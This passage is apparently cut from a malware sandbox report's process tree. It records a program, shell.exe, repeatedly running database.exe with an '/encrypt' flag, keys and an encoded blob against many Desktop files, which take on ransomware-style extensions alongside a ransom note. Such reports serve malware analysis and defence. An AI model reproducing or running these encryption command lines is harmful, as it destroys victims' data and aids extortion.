                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FindRepair.vsdm.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\HideClose.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\InitializeAssert.pps.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\InitializeResolve.mhtml.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\JoinRestart.nfo.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ProtectOpen.jpeg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ReceiveExpand.avi.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RemoveSet.mp2v.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ResetCopy.mpeg.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RestoreExpand.fon.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RevokeHide.vsx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowPush.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowSync.rle.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\StartRemove.mpeg3.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\sWiVkIcd-unycY7aQ.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TestUndo.ppt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TUKJxPJj-ELwXopms.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
